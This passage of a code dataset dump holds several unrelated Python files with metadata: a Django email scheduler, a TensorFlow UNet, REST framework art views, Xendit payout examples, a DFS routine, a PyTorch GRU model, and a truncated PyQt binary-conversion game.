Post.objects.filter(created_time__gte=date)[:10]\n\n html_content = render_to_string(\n 'blogapp/weekly_mail.html',\n {\n 'posts': posts,\n 'user': user,\n }\n )\n\n msg = EmailMultiAlternatives(\n subject = f'Weekly mail to subscribers - Sasha blog',\n body = '',\n from_email='sendme.email@yandex.ru',\n to=[user.email, ]\n )\n\n msg.attach_alternative(html_content, 'text/html')\n msg.send()\n\n\n\n\n# функция которая будет удалять неактуальные задачи\ndef delete_old_job_executions(max_age=604_800):\n \"\"\"This job deletes all apscheduler job executions older than `max_age` from the database.\"\"\"\n DjangoJobExecution.objects.delete_old_job_executions(max_age)\n\n\nclass Command(BaseCommand):\n help = \"Runs apscheduler.\"\n\n def handle(self, *args, **options):\n scheduler = BlockingScheduler(timezone=settings.TIME_ZONE)\n scheduler.add_jobstore(DjangoJobStore(), \"default\")\n\n # добавляем работу нашему задачнику\n scheduler.add_job(\n send_letters_to_subscribers,\n trigger=CronTrigger(\n day_of_week=\"mon\", hour=\"09\", minute=\"30\"\n ),\n # Тоже самое что и интервал, но задача тригера таким образом более понятна django\n id=\"send_letters_to_subscribers\", # уникальный айди\n max_instances=1,\n replace_existing=True,\n )\n logger.info(\"Added job 'my_job'.\")\n\n scheduler.add_job(\n delete_old_job_executions,\n trigger=CronTrigger(\n day_of_week=\"mon\", hour=\"00\", minute=\"00\"\n ),\n # Каждую неделю будут удаляться старые задачи, которые либо не удалось выполнить, либо уже выполнять не надо.\n id=\"delete_old_job_executions\",\n max_instances=1,\n replace_existing=True,\n )\n logger.info(\n \"Added weekly job: 'delete_old_job_executions'.\"\n )\n\n try:\n logger.info(\"Starting scheduler...\")\n scheduler.start()\n except KeyboardInterrupt:\n logger.info(\"Stopping scheduler...\")\n scheduler.shutdown()\n logger.info(\"Scheduler shut down successfully!\")","sub_path":"djblog/blogapp/management/commands/runapscheduler.py","file_name":"runapscheduler.py","file_ext":"py","file_size_in_byte":3786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"567820843","text":"import tensorflow as tf\n\nfrom tf_utils.blocks.cnn_block import CNN\n\n\nclass UNet(tf.keras.Model):\n def __init__(self, n_classes, n_layers, starting_filters, k_size, init, batch_norm, dropout, activation, conv_per_layer, max_pool,\n upsampling, kernel_regularizer, max_n_filters=512):\n super(UNet, self).__init__()\n\n self.n_layers = n_layers\n self.conv_per_layer = conv_per_layer\n self.max_pool = max_pool\n self.upsampling = upsampling\n\n if kernel_regularizer is not None:\n if kernel_regularizer[0] == \"L1\":\n kernel_regularizer = tf.keras.regularizers.L1(kernel_regularizer[1])\n elif kernel_regularizer[0] == \"L2\":\n kernel_regularizer = tf.keras.regularizers.L2(kernel_regularizer[1])\n else:\n raise NotImplementedError(kernel_regularizer)\n\n self.encoder = []\n for i in range(n_layers):\n # Set maximum number of filters\n n_filters = max_n_filters if starting_filters * (2 ** i) > max_n_filters else starting_filters * (2 ** i)\n\n # First layer does not have Batch Norm\n is_batch_norm = i != 0 and batch_norm\n\n if max_pool and i != 0:\n self.encoder.append(tf.keras.layers.MaxPool3D())\n\n # How many CNN layers at each stage\n for j in range(conv_per_layer):\n strides = 2 if j == 0 and i != 0 and max_pool is False else 1\n self.encoder.append(CNN(n_filters, k_size, strides=strides, kernel_initializer=init, batch_norm=is_batch_norm, dropout=False,\n activation=activation, kernel_regularizer=kernel_regularizer))\n\n self.decoder = []\n for i in range(n_layers - 2, -1, -1):\n n_filters = max_n_filters if starting_filters * (2 ** i) > max_n_filters else starting_filters * (2 ** i)\n\n if upsampling:\n self.decoder.append(tf.keras.layers.UpSampling3D())\n\n for j in range(conv_per_layer):\n strides = 2 if j == 0 and upsampling is False else 1\n self.decoder.append(\n CNN(n_filters, k_size, strides=strides, kernel_initializer=init, batch_norm=batch_norm, dropout=dropout, activation=activation,\n kernel_regularizer=kernel_regularizer, up=True))\n\n self.last_conv = CNN(n_classes, 3, kernel_initializer=init, batch_norm=None, dropout=0., activation=None)\n\n def call(self, x, training):\n\n skips = []\n for i in range(self.n_layers):\n\n if self.max_pool and i != 0:\n x = self.encoder[i * self.conv_per_layer + (i - 1)](x, training=training)\n\n for j in range(self.conv_per_layer):\n x = self.encoder[i * (self.conv_per_layer + int(self.max_pool)) + j](x, training=training)\n skips.append(x)\n\n skips = list(reversed(skips[:-1]))\n for i in range(len(range(self.n_layers - 2, -1, -1))):\n\n if self.upsampling:\n x = self.decoder[i * (self.conv_per_layer + int(self.upsampling))](x, training=training)\n x = tf.keras.layers.Concatenate()([x, skips[i]])\n\n for j in range(self.conv_per_layer):\n x = self.decoder[i * (self.conv_per_layer + int(self.upsampling)) + j + int(self.upsampling)](x, training=training)\n\n if j == 0 and self.upsampling is False:\n x = tf.keras.layers.Concatenate()([x, skips[i]])\n\n return self.last_conv(x)\n\n def summary(self, input_shape):\n \"\"\"\n :param input_shape: (32, 32, 1)\n \"\"\"\n x = tf.keras.Input(shape=input_shape)\n model = tf.keras.Model(inputs=[x], outputs=self.call(x, training=False))\n tf.keras.utils.plot_model(model, to_file='UNet.png', show_shapes=True, expand_nested=True)\n model.summary(line_length=200)\n\n\nif __name__ == \"__main__\":\n net = UNet(9, 5, 64, 3, \"he_normal\", False, 0., tf.keras.layers.LeakyReLU, 3, True)\n net.summary((176, 144, 128, 2))\n","sub_path":"francesco/src/model/unet.py","file_name":"unet.py","file_ext":"py","file_size_in_byte":4073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"400673293","text":"# pylint: disable=no-member, no-self-use\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.exceptions import NotFound\nfrom rest_framework.permissions import IsAuthenticated, IsAuthenticatedOrReadOnly\n\nfrom .models import Art\nfrom .serializers import PopulatedArtSerializer, ArtSerializer, UpdateArtSerializer\n\nclass ArtListView(APIView):\n\n permission_classes = (IsAuthenticatedOrReadOnly, )\n\n def get(self, _request):\n arts = Art.objects.all()\n serialized_arts = PopulatedArtSerializer(arts, many=True)\n return Response(serialized_arts.data, status=status.HTTP_200_OK)\n\n def post(self, request):\n request.data['owner'] = request.user.id\n new_art = ArtSerializer(data=request.data)\n if new_art.is_valid():\n new_art.save()\n return Response(new_art.data, status=status.HTTP_201_CREATED)\n return Response(new_art.errors, status=status.HTTP_422_UNPROCESSABLE_ENTITY)\n\nclass ArtDetailView(APIView):\n\n permission_classes = (IsAuthenticatedOrReadOnly, )\n\n def get_art(self, pk):\n try:\n return Art.objects.get(pk=pk)\n except Art.DoesNotExist:\n raise NotFound()\n\n def get(self, _request, pk):\n art = self.get_art(pk)\n serialized_art = PopulatedArtSerializer(art)\n return Response(serialized_art.data, status=status.HTTP_200_OK)\n\n def put(self, request, pk):\n art_to_update = self.get_art(pk=pk)\n updated_art = UpdateArtSerializer(art_to_update, data=request.data)\n if updated_art.is_valid():\n updated_art.save()\n return Response(updated_art.data, status=status.HTTP_202_ACCEPTED)\n return Response(updated_art.errors, status=status.HTTP_422_UNPROCESSABLE_ENTITY)\n\n def delete(self, _request, pk):\n art_to_delete = self.get_art(pk=pk)\n art_to_delete.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n","sub_path":"art/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"33636496","text":"import time\r\n\r\nfrom print_running_function import print_running_function\r\n\r\n# Hackish method to import from another directory\r\n# Useful while xendit-python isn't released yet to the public\r\nimport importlib.machinery\r\n\r\nloader = importlib.machinery.SourceFileLoader(\"xendit\", \"../xendit/__init__.py\")\r\nxendit = loader.load_module(\"xendit\")\r\n\r\n\r\nclass CreatePayout:\r\n @staticmethod\r\n def run(xendit_instance, **kwargs):\r\n try:\r\n payout = xendit_instance.Payout.create(**kwargs)\r\n print(payout)\r\n except xendit.XenditError as e:\r\n print(\"Error status code:\", e.status_code)\r\n print(\"Error message:\", e)\r\n\r\n @staticmethod\r\n def example(xendit_instance):\r\n args = {\r\n \"external_id\": f\"payout-{int(time.time())}\",\r\n \"amount\": 50000,\r\n \"email\": \"test@email.co\",\r\n }\r\n print_running_function(\"xendit.Payout.create\", args)\r\n CreatePayout.run(xendit_instance, **args)\r\n\r\n\r\nclass GetPayout:\r\n @staticmethod\r\n def run(xendit_instance, **kwargs):\r\n try:\r\n payout = xendit_instance.Payout.get(**kwargs)\r\n print(payout)\r\n except xendit.XenditError as e:\r\n print(\"Error status code:\", e.status_code)\r\n print(\"Error message:\", e)\r\n\r\n @staticmethod\r\n def example(xendit_instance):\r\n id = input(\"Please input your id: \")\r\n args = {\r\n \"id\": id,\r\n }\r\n print_running_function(\"xendit.Payout.get\", args)\r\n GetPayout.run(xendit_instance, **args)\r\n\r\n\r\nclass VoidPayout:\r\n @staticmethod\r\n def run(xendit_instance, **kwargs):\r\n try:\r\n payout = xendit_instance.Payout.void(**kwargs)\r\n print(payout)\r\n except xendit.XenditError as e:\r\n print(\"Error status code:\", e.status_code)\r\n print(\"Error message:\", e)\r\n\r\n @staticmethod\r\n def example(xendit_instance):\r\n id = input(\"Please input your id: \")\r\n args = {\r\n \"id\": id,\r\n }\r\n print_running_function(\"xendit.Payout.void\", args)\r\n VoidPayout.run(xendit_instance, **args)\r\n\r\n\r\ndef ask_payout_input():\r\n print(\"Input the action that you want to use\")\r\n print(\"0. Exit\")\r\n print(\"1. Create Payout\")\r\n print(\"2. Get Payout\")\r\n print(\"3. Void a Payout\")\r\n try:\r\n return int(input())\r\n except ValueError:\r\n print(\"Invalid input. Please type a number\")\r\n return ask_payout_input()\r\n\r\n\r\ndef payout_example(xendit_instance):\r\n payout_input = ask_payout_input()\r\n while payout_input != 0:\r\n if payout_input == 1:\r\n print(\"Running example of Create Payout\")\r\n CreatePayout.example(xendit_instance)\r\n elif payout_input == 2:\r\n print(\"Running example of Get Payout\")\r\n GetPayout.example(xendit_instance)\r\n elif payout_input == 3:\r\n print(\"Running example of Void a Payout\")\r\n VoidPayout.example(xendit_instance)\r\n payout_input = ask_payout_input()\r\n","sub_path":"examples/payout_example.py","file_name":"payout_example.py","file_ext":"py","file_size_in_byte":3061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"528597859","text":"class Graph(object):\n\n\tdef __init__(self):\n\t\tself.nodes = {}\n\n\tdef add_edge(self, from_node, to_node):\n\t\tself.nodes.setdefault(from_node, []).append(to_node)\n\n\ndef DFS(graph, root):\n\t\n\tvisited = [False] * len(graph.nodes)\n\n\tstack = []\n\tstack.append(root)\n\n\twhile stack != []:\n\t\tcurrent_node = stack.pop()\n\t\tprint('{}, '.format(current_node))\n\t\tvisited[current_node] = True\n\t\tfor i in range(1, len(graph.nodes[current_node])+1):\n\t\t\titem = graph.nodes[current_node][-1*i]\n\t\t\tif not visited[item]:\n\t\t\t\tstack.append(item)\n\n\treturn \n\n\ng = Graph()\ng.add_edge(0, 1)\ng.add_edge(0, 2)\ng.add_edge(1, 2)\ng.add_edge(2, 0)\ng.add_edge(2, 3)\ng.add_edge(3, 3)\n\nprint(g.nodes)\n\nDFS(g, 2)","sub_path":"python-practice/GeekforGeeks/dfs_graph_traversal_simple.py","file_name":"dfs_graph_traversal_simple.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"413566852","text":"import math\nimport numpy as np\nimport torch\nimport torch.nn as nn\n\n\nclass cat_gru_prediction(nn.Module):\n def __init__(self, config): # input_size, hidden_size, num_layers, num_classes):\n super(cat_gru_prediction, self).__init__()\n self.config = config\n self.hidden_size = config.hidden_size\n self.num_layers = config.num_layers\n # default skeleton timestep == 10, make 10 FC layer for every timestep\n self.gru = nn.GRU(self.config.input_size, self.config.hidden_size,\n self.config.num_layers, batch_first=True,\n dropout=self.config.dropout, bidirectional=False)\n teacher_feature_size = 512\n self.fc2 = nn.Linear(config.hidden_size, config.hidden_size)\n self.fc3 = nn.Linear(config.hidden_size, teacher_feature_size)\n self.fc4 = nn.Linear(config.hidden_size + teacher_feature_size, config.num_classes)\n self._initialize_weights()\n if torch.cuda.is_available():\n torch.cuda.set_device(config.DEFAULT_GPU)\n \n def multi_lstm(self, time_step):\n layer = []\n for _ in range(time_step):\n layer.append(nn.LSTM(self.config.input_size, self.config.hidden_size,\n self.config.num_layers, batch_first=True, dropout=self.config.dropout))\n return nn.Sequential(*layer)\n \n def multi_fc(self, time_step):\n layer = []\n for _ in range(time_step):\n layer.append(nn.Linear(self.config.hidden_size, self.config.num_classes))\n return nn.Sequential(*layer)\n \n def forward(self, x):\n # Set initial states\n h0 = torch.zeros(self.num_layers, x.size(0), self.hidden_size).cuda()\n # with torch.no_grad():\n if self.config.F == 'fc':\n with torch.no_grad():\n ht, _ = self.gru(x, h0)\n feature = [self.fc2(ht[:, i, :]) for i in range(ht.size(1))]\n feature = torch.stack(feature, dim=1)\n feature = [self.fc3(ht[:, i, :]) for i in range(feature.size(1))]\n feature = torch.stack(feature, dim=1)\n else:\n ht, _ = self.gru(x, h0)\n feature = [self.fc2(ht[:, i, :]) for i in range(ht.size(1))]\n feature = torch.stack(feature, dim=1)\n feature = [self.fc3(ht[:, i, :]) for i in range(feature.size(1))]\n feature = torch.stack(feature, dim=1)\n # ht.size() = (batch, T, hidden*direction), ht for the last layer in every time step\n # _ = (h_n, c_n), shape = (num_layers * num_directions, batch, hidden_size),\n # (h_n, c_n): ht and ct for the last time step in every lstm layer\n # Decode hidden state of all time step\n if self.config.F == 'feature':\n with torch.no_grad():\n cat = torch.cat([ht, feature], dim=-1)\n logit = [self.fc4(cat[:, i, :]) for i in range(cat.size(1))]\n logit = torch.stack(logit, dim=1)\n else:\n cat = torch.cat([ht, feature], dim=-1)\n logit = [self.fc4(cat[:, i, :]) for i in range(cat.size(1))]\n logit = torch.stack(logit, dim=1)\n return feature, logit\n \n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n for name, param in self.gru.named_parameters():\n if name.split('_')[0] == 'weight':\n nn.init.orthogonal_(param.data, gain=1)\n # param.data.normal_(0, 0.01)\n # if name.split('_')[0] == 'bias':\n # # set forget bias\n # param.data[self.hidden_size:self.hidden_size * 2].fill_(1)\n \n def get_param(self, lr):\n lstm_id = [id(p) for p in self.lstm.parameters()]\n fc_param = []\n for param in self.parameters():\n if id(param) not in lstm_id:\n fc_param.append(param)\n return [{'params': self.lstm.parameters(), 'lr': self.config.lstm_lr * lr},\n {'params': fc_param, 'lr': lr}]\n\n","sub_path":"models/cat_gru_prediction.py","file_name":"cat_gru_prediction.py","file_ext":"py","file_size_in_byte":4516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"117868579","text":"#Network Binary Game\n\nimport sys\nfrom PyQt4 import QtGui,QtCore\nimport random\n\nversion = \"Network Binary Game Alpha v0.60\"\n\nclass IPHostClass(object):\n def __init__(self,num1,num2,num3,num4):\n self.num1 = num1\n self.num2 = num2\n self.num3 = num3\n self.num4 = num4\n\nmainIPHost = IPHostClass(0,0,0,0)\nhideAidMatrix = True\nvarInitialState = \"\"\nrandomNum1 = \"\"\ncurNumHolderVar128, curNumHolderVar64, curNumHolderVar32, curNumHolderVar16, curNumHolderVar8, curNumHolderVar4, curNumHolderVar2, curNumHolderVar1 = (varInitialState,)*8\nanswerDecVar128, answerDecVar64, answerDecVar32, answerDecVar16, answerDecVar8, answerDecVar4, answerDecVar2, answerDecVar1 = (varInitialState,)*8\nanswerBinaryInputVar128, answerBinaryInputVar64, answerBinaryInputVar32, answerBinaryInputVar16, answerBinaryInputVar8, answerBinaryInputVar4, answerBinaryInputVar2, answerBinaryInputVar1 = (varInitialState,)*8\n\n\ndef main():\n \n def numberProcessing():\n global curNumHolderVar128, curNumHolderVar64, curNumHolderVar32, curNumHolderVar16, curNumHolderVar8, curNumHolderVar4, curNumHolderVar2, curNumHolderVar1\n global answerDecVar128, answerDecVar64, answerDecVar32, answerDecVar16, answerDecVar8, answerDecVar4, answerDecVar2, answerDecVar1\n global answerBinaryInputVar128, answerBinaryInputVar64, answerBinaryInputVar32, answerBinaryInputVar16, answerBinaryInputVar8, answerBinaryInputVar4, answerBinaryInputVar2, answerBinaryInputVar1\n global randomNum1\n\n \"\"\"128\"\"\"\n if randomNum1 >= 128:\n curNumHolder128.setText(str(randomNum1))\n answerDecVar128 = randomNum1 - 128\n return\n elif answerBinaryInput128.text() != \"1\": \n answerBinaryInput128.setText(\"0\")\n answerBinaryInputVar128 = \"0\"\n \"\"\"//128\"\"\"\n \n \"\"\"64\"\"\" \n if randomNum1 < 128 and randomNum1 >= 64:\n curNumHolder64.setText(str(randomNum1))\n answerDecVar64 = randomNum1 - 64\n return\n elif answerBinaryInput64.text() != \"1\":\n answerBinaryInput64.setText(\"0\")\n answerBinaryInputVar64 = \"0\"\n \"\"\"//64\"\"\"\n \n \"\"\"32\"\"\"\n if randomNum1 < 64 and randomNum1 >= 32:\n curNumHolder32.setText(str(randomNum1))\n answerDecVar32 = randomNum1 - 32\n return\n elif answerBinaryInput32.text() != \"1\":\n answerBinaryInput32.setText(\"0\")\n answerBinaryInputVar32 = \"0\"\n \"\"\"//32\"\"\"\n \n \"\"\"16\"\"\"\n if randomNum1 < 32 and randomNum1 >= 16:\n curNumHolder16.setText(str(randomNum1))\n answerDecVar16 = randomNum1 - 16\n return\n elif answerBinaryInput16.text() != \"1\":\n answerBinaryInput16.setText(\"0\")\n answerBinaryInputVar16 = \"0\"\n \"\"\"//16\"\"\"\n \n \"\"\"8\"\"\"\n if randomNum1 < 16 and randomNum1 >= 8:\n curNumHolder8.setText(str(randomNum1))\n answerDecVar8 = randomNum1 - 8\n return\n elif answerBinaryInput8.text() != \"1\":\n answerBinaryInput8.setText(\"0\")\n answerBinaryInputVar8 = \"0\"\n \"\"\"//8\"\"\"\n \n \"\"\"4\"\"\"\n if randomNum1 < 8 and randomNum1 >= 4:\n curNumHolder4.setText(str(randomNum1))\n answerDecVar4 = randomNum1 - 4\n return\n elif answerBinaryInput4.text() != \"1\":\n answerBinaryInput4.setText(\"0\")\n answerBinaryInputVar4 = \"0\"\n \"\"\"//4\"\"\"\n \n \"\"\"2\"\"\"\n if randomNum1 < 4 and randomNum1 >= 2:\n curNumHolder2.setText(str(randomNum1))\n answerDecVar2 = randomNum1 - 2\n return\n elif answerBinaryInput2.text() != \"1\":\n answerBinaryInput2.setText(\"0\")\n answerBinaryInputVar2 = \"0\"\n \"\"\"//2\"\"\"\n \n \"\"\"1\"\"\"\n if randomNum1 < 2 and randomNum1 >= 1:\n curNumHolder1.setText(str(randomNum1))\n answerDecVar1 = randomNum1 - 1\n return\n elif answerBinaryInput1.text() != \"1\":\n answerBinaryInput1.setText(\"0\")\n answerBinaryInputVar1 = \"0\"\n \"\"\"//1\"\"\"\n \n def checkAnswer128():\n global randomNum1\n \n if answerDecInput128.text() == str(answerDecVar128):\n answerDecInput128.setStyleSheet(\"QWidget { background-color:green}\")\n answerBinaryInput128.setStyleSheet(\"QWidget { background-color:green}\")\n answerBinaryInput128.setText(\"1\")\n randomNum1 = int(answerDecVar128)\n numberProcessing()\n else:\n answerDecInput128.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput128.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput128.setText(\"\")\n def checkAnswer64():\n global randomNum1\n if answerDecInput64.text() == str(answerDecVar64):\n answerDecInput64.setStyleSheet(\"QWidget { background-color:green}\")\n answerBinaryInput64.setStyleSheet(\"QWidget { background-color:green}\")\n answerBinaryInput64.setText(\"1\")\n randomNum1 = int(answerDecVar64)\n numberProcessing()\n else:\n answerDecInput64.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput64.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput64.setText(\"\")\n def checkAnswer32():\n global randomNum1\n if answerDecInput32.text() == str(answerDecVar32):\n answerDecInput32.setStyleSheet(\"QWidget { background-color:green}\")\n answerBinaryInput32.setStyleSheet(\"QWidget { background-color:green}\")\n answerBinaryInput32.setText(\"1\")\n randomNum1 = int(answerDecVar32)\n numberProcessing()\n else:\n answerDecInput32.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput32.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput32.setText(\"\")\n def checkAnswer16():\n global randomNum1\n if answerDecInput16.text() == str(answerDecVar16):\n answerDecInput16.setStyleSheet(\"QWidget { background-color:green}\")\n answerBinaryInput16.setStyleSheet(\"QWidget { background-color:green}\")\n answerBinaryInput16.setText(\"1\")\n randomNum1 = int(answerDecVar16)\n numberProcessing()\n else:\n answerDecInput16.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput16.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput16.setText(\"\")\n def checkAnswer8():\n global randomNum1\n if answerDecInput8.text() == str(answerDecVar8):\n answerDecInput8.setStyleSheet(\"QWidget { background-color:green}\")\n answerBinaryInput8.setStyleSheet(\"QWidget { background-color:green}\")\n answerBinaryInput8.setText(\"1\")\n randomNum1 = int(answerDecVar8)\n numberProcessing()\n else:\n answerDecInput8.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput8.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput8.setText(\"\")\n def checkAnswer4():\n global randomNum1\n if answerDecInput4.text() == str(answerDecVar4):\n answerDecInput4.setStyleSheet(\"QWidget { background-color:green}\")\n answerBinaryInput4.setStyleSheet(\"QWidget { background-color:green}\")\n answerBinaryInput4.setText(\"1\")\n randomNum1 = int(answerDecVar4)\n numberProcessing()\n else:\n answerDecInput4.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput4.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput4.setText(\"\")\n def checkAnswer2():\n global randomNum1\n if answerDecInput2.text() == str(answerDecVar2):\n answerDecInput2.setStyleSheet(\"QWidget { background-color:green}\")\n answerBinaryInput2.setStyleSheet(\"QWidget { background-color:green}\")\n answerBinaryInput2.setText(\"1\")\n randomNum1 = int(answerDecVar2)\n numberProcessing()\n else:\n answerDecInput2.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput2.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput2.setText(\"\")\n def checkAnswer1():\n global randomNum1\n if answerDecInput1.text() == str(answerDecVar1):\n answerDecInput1.setStyleSheet(\"QWidget { background-color:green}\")\n answerBinaryInput1.setStyleSheet(\"QWidget { background-color:green}\")\n answerBinaryInput1.setText(\"1\")\n randomNum1 = int(answerDecVar1)\n numberProcessing()\n else:\n answerDecInput1.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput1.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput1.setText(\"\")\n \n \n def getNewNum():\n global randomNum1\n \"\"\"Clear Initial state\"\"\"\n global varInitialState\n varInitialState = \"\"\n answerDecInput128.setStyleSheet(\"QWidget { background-color:white}\")\n answerDecInput64.setStyleSheet(\"QWidget { background-color:white}\")\n answerDecInput32.setStyleSheet(\"QWidget { background-color:white}\")\n answerDecInput16.setStyleSheet(\"QWidget { background-color:white}\")\n answerDecInput8.setStyleSheet(\"QWidget { background-color:white}\")\n answerDecInput4.setStyleSheet(\"QWidget { background-color:white}\")\n answerDecInput2.setStyleSheet(\"QWidget { background-color:white}\")\n answerDecInput1.setStyleSheet(\"QWidget { background-color:white}\")\n \n answerBinaryInput128.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput64.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput32.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput16.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput8.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput4.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput2.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput1.setStyleSheet(\"QWidget { background-color:white}\")\n \n curNumHolder128.setText(varInitialState)\n curNumHolder64.setText(varInitialState)\n curNumHolder32.setText(varInitialState)\n curNumHolder16.setText(varInitialState)\n curNumHolder8.setText(varInitialState)\n curNumHolder4.setText(varInitialState)\n curNumHolder2.setText(varInitialState)\n curNumHolder1.setText(varInitialState)\n \n answerDecInput128.setText(varInitialState)\n answerDecInput64.setText(varInitialState)\n answerDecInput32.setText(varInitialState)\n answerDecInput16.setText(varInitialState)\n answerDecInput8.setText(varInitialState)\n answerDecInput4.setText(varInitialState)\n answerDecInput2.setText(varInitialState)\n answerDecInput1.setText(varInitialState)\n \n answerBinaryInput128.setText(varInitialState)\n answerBinaryInput64.setText(varInitialState)\n answerBinaryInput32.setText(varInitialState)\n answerBinaryInput16.setText(varInitialState)\n answerBinaryInput8.setText(varInitialState)\n answerBinaryInput4.setText(varInitialState)\n answerBinaryInput2.setText(varInitialState)\n answerBinaryInput1.setText(varInitialState)\n \"\"\"//Clear Initial state\"\"\"\n \n \"\"\"Get random values for the IP address\"\"\"\n mainIPHost.num1 = random.randrange(0,255)\n \"\"\"//Get random values for the IP address\"\"\"\n randomNum1 = mainIPHost.num1\n numberProcessing()\n \"\"\"Convert values to string for setText\"\"\"\n mainIPnumbersToStr1= str(mainIPHost.num1)\n \"\"\"//Convert values to string for setText\"\"\"\n \n \"\"\"Final binary values and variables\"\"\"\n mainIPnumbersBin1= \"{0:08b}\".format(mainIPHost.num1)\n \"\"\"//Final binary values and variables\"\"\"\n \n def showHideAidMatrix():\n global hideAidMatrix\n if hideAidMatrix is False:\n hideAidMatrix = True\n elif hideAidMatrix is True:\n hideAidMatrix = False \n \"\"\"Hides/Shows the Main Aid Matrix\"\"\"\n labelForMainMatrix.setHidden(hideAidMatrix)\n mainAidMatrix128.setHidden(hideAidMatrix)\n mainAidMatrix64.setHidden(hideAidMatrix)\n mainAidMatrix32.setHidden(hideAidMatrix)\n mainAidMatrix16.setHidden(hideAidMatrix)\n mainAidMatrix8.setHidden(hideAidMatrix)\n mainAidMatrix4.setHidden(hideAidMatrix)\n mainAidMatrix2.setHidden(hideAidMatrix)\n mainAidMatrix1.setHidden(hideAidMatrix)\n \"\"\"//Hides/Shows the Main Aid Matrix\"\"\"\n \n \"\"\"Hides/Shows the Secondary Aid Matrix\"\"\"\n labelForSecMatrix.setHidden(hideAidMatrix)\n secAidMatrix128.setHidden(hideAidMatrix)\n secAidMatrix64.setHidden(hideAidMatrix)\n secAidMatrix32.setHidden(hideAidMatrix)\n secAidMatrix16.setHidden(hideAidMatrix)\n secAidMatrix8.setHidden(hideAidMatrix)\n secAidMatrix4.setHidden(hideAidMatrix)\n secAidMatrix2.setHidden(hideAidMatrix)\n secAidMatrix1.setHidden(hideAidMatrix)\n \"\"\"//Hides/Shows the Secondary Aid Matrix\"\"\"\n \n \"\"\"Main Application\"\"\"\n binaryGame = QtGui.QApplication(sys.argv)\n mainWindow = QtGui.QWidget()\n mainWindow.setWindowTitle(version)\n mainWindow.show()\n \"\"\"//Main Application\"\"\"\n \n \"\"\"Button New number\"\"\"\n newNumButton = QtGui.QPushButton(\"New Number\", mainWindow)\n newNumButton.show()\n QtCore.QObject.connect(newNumButton, QtCore.SIGNAL(\"clicked()\"), getNewNum)\n \"\"\"//Button New number\"\"\"\n \n \"\"\"Button Aid Matrix Show/Hide\"\"\"\n buttonHideShowMatrix = QtGui.QPushButton(\"Aid Matrix\", mainWindow)\n buttonHideShowMatrix.show()\n buttonHideShowMatrix.connect(buttonHideShowMatrix, QtCore.SIGNAL(\"clicked()\"), showHideAidMatrix)\n \"\"\"//Button Aid Matrix Show/Hide\"\"\"\n \n \"\"\"Binary 8bits Buttons\"\"\"\n labelForBinButtons = QtGui.QLabel(\"\",mainWindow)\n labelForBinButtons.setMinimumSize(120,0)\n labelForBinButtons.show()\n buttonBin128= QtGui.QPushButton(\"128\", mainWindow)\n buttonBin128.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed)\n buttonBin128.setDisabled(True)\n buttonBin64= QtGui.QPushButton(\"64\", mainWindow)\n buttonBin64.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed)\n buttonBin64.setDisabled(True)\n buttonBin32= QtGui.QPushButton(\"32\", mainWindow)\n buttonBin32.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed)\n buttonBin32.setDisabled(True)\n buttonBin16= QtGui.QPushButton(\"16\", mainWindow)\n buttonBin16.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed)\n buttonBin16.setDisabled(True)\n buttonBin8= QtGui.QPushButton(\"8\", mainWindow)\n buttonBin8.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed)\n buttonBin8.setDisabled(True)\n buttonBin4= QtGui.QPushButton(\"4\", mainWindow)\n buttonBin4.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed)\n buttonBin4.setDisabled(True)\n buttonBin2= QtGui.QPushButton(\"2\", mainWindow)\n 